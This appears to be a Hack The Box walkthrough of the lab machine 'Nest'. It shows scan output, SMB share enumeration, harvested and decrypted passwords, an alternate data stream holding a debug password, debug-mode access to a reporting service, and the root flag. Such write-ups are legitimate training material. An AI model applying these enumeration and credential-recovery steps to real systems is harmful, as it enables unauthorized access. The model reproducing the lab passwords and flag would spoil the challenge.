Nest

Walkthrough of Nest on HTB.

Nmap Scan

**PORT    STATE SERVICE       REASON          VERSION
445/tcp open  microsoft-ds? syn-ack ttl 127
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized

Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|2012|Phone|8.1 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_8.1
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Vista or Windows 7 (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (91%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Embedded Standard 7 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (89%)

No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=3/8%OT=445%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=67CCFDBA%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=10D%TI=I%II=I%SS=S%TS=7)
SEQ(SP=FE%GCD=1%ISR=106%TI=I%II=I%SS=S%TS=7)
OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%TG=80%W=2000%O=M53CNW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

PORT     STATE SERVICE VERSION
4386/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     Reporting Service V1.2
|     Unrecognised command
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-09T02:31:49
|_  start_date: 2025-03-09T02:27:01
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 28056/tcp): CLEAN (Timeout)
|   Check 2 (port 20108/tcp): CLEAN (Timeout)
|   Check 3 (port 17014/udp): CLEAN (Timeout)
|   Check 4 (port 58832/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 1s**

SMB Shares

(jimmy@kali)-[~/HTB/rooms/nest]
└─$ netexec smb nest.htb -u 'guest' -p '' --shares
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 7 / Server 2008 R2 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\\guest: 
SMB         10.10.10.178    445    HTB-NEST         [*] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$                          Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$                              Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ            
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$                         
SMB         10.10.10.178    445    HTB-NEST         Users           READ   

• Users

smbclient \\\\\\\\nest.htb\\\\Users
Password for [WORKGROUP\\jimmy]:
Try "help" to get a list of possible commands.
smb: \\> ls
  .                                   D        0  Sat Jan 25 18:04:21 2020
  ..                                  D        0  Sat Jan 25 18:04:21 2020
  Administrator                       D        0  Fri Aug  9 11:08:23 2019
  C.Smith                             D        0  Sun Jan 26 02:21:44 2020
  L.Frost                             D        0  Thu Aug  8 13:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 13:02:50 2019
  TempUser                            D        0  Wed Aug  7 18:55:56 2019

User Enum

USERNAME	PASSWORD
TempUser	welcome2019
c.smith	fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=	xRxRxPANCAK3SxRxRx
	WBQ201953D8w
	XtH4nkS4Pl4y1nGX

netexec smb nest.htb -u 'TempUser' -p 'welcome2019' --shares             
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 7 / Server 2008 R2 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\\TempUser:welcome2019 
SMB         10.10.10.178    445    HTB-NEST         [*] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$                          Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$                              Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ            
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$         READ            
SMB         10.10.10.178    445    HTB-NEST         Users           READ         

• XML Enum

        # Notepad ++ Config.xml
         
        <File filename="C:\\windows\\System32\\drivers\\etc\\hosts" />
        <File filename="\\\\HTB-NEST\\Secure$\\IT\\Carl\\Temp.txt" />
        <File filename="C:\\Users\\C.Smith\\Desktop\\todo.txt" />

(jimmy@kali)-[~/HTB/rooms/nest]
└─$ cat RU_config.xml           
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>" xmlns:xsd="<http://www.w3.org/2001/XMLSchema>">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>          

• Downloaded RUScanner .Net app and reviewed code using Visual Studio
• Stepped through the app in Debug mode to get the decrypted password.
• xRxRxPANCAK3SxRxRx

Enumerated C.Smith user

• found a file called “Debug Mode Password.txt
  • This file is an alternate data stream file
  • To View file I used allinfo command

smb: \\C.Smith\\HQK Reporting\\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Wed Jul 21 02:47:12 PM 2021 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \\C.Smith\\HQK Reporting\\> 

• Downloaded these file and read it using alternate file name

(jimmy㉿kali)-[~/HTB/rooms/nest/RU]
└─$ cat "Debug Mode Password.txt:Password" 
WBQ201953D8w

Enumerated Password: WBQ201953D8w

• Sprayed password against all users did not work
• Enumerated port 4386

Telnet Port 4386

─(jimmy㉿kali)-[~/HTB/rooms/nest/RU]
└─$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>DEBUG WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>HELP

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

>SHOWQUERY

Error: Invalid number of arguments specified
>SERVICE

--- HQK REPORTING SERVER INFO ---

Version: 1.2.0.0
Server Hostname: HTB-NEST
Server Process: "C:\\Program Files\\HQK\\HqkSvc.exe"
Server Running As: Service_HQK
Initial Query Directory: C:\\Program Files\\HQK\\ALL QUERIES

>LIST

• After Enumerating directories I found Ldap.conf with administrator user and encrypted password.

>SETDIR C:\\Program Files\\HQK

Current directory set to HQK
>LIST

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>SETDIR LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>RUNQUERY Ldap.conf

Invalid database configuration found. Please contact your system administrator
>SHOWQUERY Ldap.conf

Error: Input string was not in a correct format.
>SHOWQUERY 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

>LIST   

Enumerated HqkSvc.exe

• Earlier I found HqkSvc.exe I decompiled the app using JetBrain dotpeek.

• I modified the VB script Utils.vb with this encrypted string
• I also had to modify the RU_config.xml file with the encrypted password string.

• Ran Debug and stepped through the app to decrypt the password.

Root Flag

(jimmy㉿kali)-[~/HTB/rooms/nest]
└─$ cat root.txt                 
5a8bf9231f5a75141624105b36ff370d